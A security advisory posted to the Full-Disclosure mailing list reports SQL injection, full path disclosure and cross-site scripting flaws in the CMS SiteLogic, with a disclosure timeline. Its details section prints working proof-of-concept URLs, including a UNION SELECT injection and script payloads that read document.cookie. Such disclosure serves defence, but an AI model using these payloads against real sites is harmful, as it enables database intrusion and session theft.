Hello Full-Disclosure! I want to warn you about security vulnerabilities in CMS SiteLogic. It's Ukrainian commercial CMS. In addition to previously reported vulnerabilities (disclosed this year), I will report about vulnerabilities in this CMS, which I disclosed in 2009.
----------------------------- Advisory: Vulnerabilities in CMS SiteLogic ----------------------------- URL: http://websecurity.com.ua/3272/ ----------------------------- Affected products: all versions of CMS SiteLogic. ----------------------------- Timeline: 03.03.2008 - found vulnerabilities. 03.03.2008 - informed developers. First time I used private disclosure approach, but they just ignored (as holes in their CMS, as holes at their web site). So then I used responsible full disclosure approach. 08.02.2009 - informed admins of vulnerable web site where I found vulnerabilities (they also ignored). 27.06.2009 - disclosed at my site. 28.06.2009 - additionally informed developers. ----------------------------- Details: These are SQL Injection, Full path disclosure and Cross-Site Scripting vulnerabilities. SQL Injection: http://site/index.php?mid=-1%20union%20select%201,1,version(),1,1,1,1,1 Full path disclosure: http://site/index.php?mid=’ http://site/includes/stat.php XSS: http://site/index.php?mid=10&action=news_full&search_item=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/index.php?mid=45&action=search_list&str=%3Cscript%3Ealert(document.cookie)%3C/script%3E Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/